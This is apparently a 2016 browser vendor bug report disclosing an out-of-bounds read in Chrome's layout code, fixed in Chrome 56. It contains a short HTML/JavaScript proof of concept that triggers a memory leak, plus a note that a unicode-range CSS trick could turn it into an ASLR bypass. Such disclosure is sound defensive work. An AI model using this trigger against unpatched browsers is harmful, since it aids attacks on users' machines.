Status: Fixed
Closed: Feb 2017
Google Chrome: out-of-bound read in layout
Project Member Reported by ifratric@google.com, Dec 7 2016
Chrome bug:

https://bugs.chromium.org/p/chromium/issues/detail?id=671328

PoC:

<style>
content { contain: size layout; }
</style>
<script>
function leak() {
 document.execCommand("selectAll"); 
 opt.text = ""; 
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>

Infoleak is demonstrated in the attached screenshot.

Since this is a layout bug, AFAIK the leaked data can't be obtained via DOM calls; however, it's possible to obtain it using tricks like the unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach), which is likely sufficient to turn this into an ASLR bypass.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Attachment: infoleak.png (14.5 KB)
Project Member Comment 1 by ifratric@google.com, Feb 22 2017
Labels: -Restrict-View-Commit
Status: Fixed
Fixed in Chrome 56.
Project Member Comment 2 by ifratric@google.com, Feb 23 2017
The patch in Chrome 56 is https://chromium.googlesource.com/chromium/src/+/74c7fa91b738155df1b8bb871d81f92c28c7941a. That patch adds RELEASE_CHECK for the error condition and turns this into a (non-exploitable) crash.

The patch for the root cause is https://chromium.googlesource.com/chromium/src/+/72473efe964b34ed70910de4cc59c6295cc63019. That one didn't make it into the release.